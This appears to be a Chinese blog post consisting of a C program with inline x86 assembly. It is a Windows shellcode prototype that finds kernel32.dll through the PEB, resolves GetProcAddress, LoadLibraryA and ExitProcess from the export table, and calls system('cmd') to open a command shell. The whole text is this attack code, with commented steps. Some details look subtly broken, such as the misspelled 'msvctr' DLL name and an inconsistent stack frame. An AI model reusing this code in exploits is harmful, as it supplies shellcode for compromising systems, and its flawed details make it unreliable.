int main()
{
__asm
{
push ebp
sub esp, 0x40
mov ebp, esp
mov eax, fs:0x30 ;PEB
mov eax, [eax + 0x0C] ;Ldr
mov esi, [eax + 0x1C] ;Flink
lodsd
mov edi, [eax + 0x08] ;edi = kernel32.dll的地址
mov eax, [edi + 3Ch] ;eax = PE首部
mov edx, [edi + eax + 78h]
add edx, edi ;edx = 输出表地址
mov ecx, [edx + 18h] ;ecx = 输出函数的个数
mov ebx, [edx + 20h]
add ebx, edi ;ebx = 函数名地址, AddressOfName
search:
dec ecx
mov esi, [ebx + ecx * 4]
add esi, edi
mov eax, 'PteG' ;'PteG'
cmp [esi], eax
jne search
mov eax, 'Acor' ;'Acor'
cmp [esi + 4], eax
jne search
mov ebx, [edx + 24h]
add ebx, edi ;ebx = 索引号地址,AddressOf
mov cx, [ebx + ecx * 2] ;ecx = 计算出的索引号值
mov ebx, [edx + 1ch]
add ebx, edi ;ebx = 函数地址的起始位置,AddressOfFunction
mov eax, [ebx + ecx * 4]
add eax, edi ;利用索引值,计算出GetProcAddress的地址
mov [ebp + 40h], eax ;把GetProcAddress的地址存在ebp+40h中
push 0 ;LoadLibraryA
push dword ptr 'Ayra'
push dword ptr 'rbiL'
push dword ptr 'daoL'
push esp
push edi
call [ebp + 40h]
mov [ebp + 44h], eax
push dword ptr 'sse' ;ExitProcess
push dword ptr 'corP'
push dword ptr 'tixE'
push esp
push edi
call [ebp + 40h]
mov [ebp + 12h], eax
push dword ptr 'tr' ;LoadBriary("msvctr.dll")
push dword ptr 'cvsm'
push esp
call [ebp + 44h]
mov edi, eax
push dword ptr 'me' ;system地址
push dword ptr 'tsys'
push esp
push edi
call [ebp + 40h]
mov [ebp + 4], eax
push dword ptr 'dmc' ;system("cmd")
push esp
call [ebp + 4]
push 0
mov eax, [ebp + 12h]
call eax
}
return 0;
}
阅读(918) | 评论(0) | 转发(0) |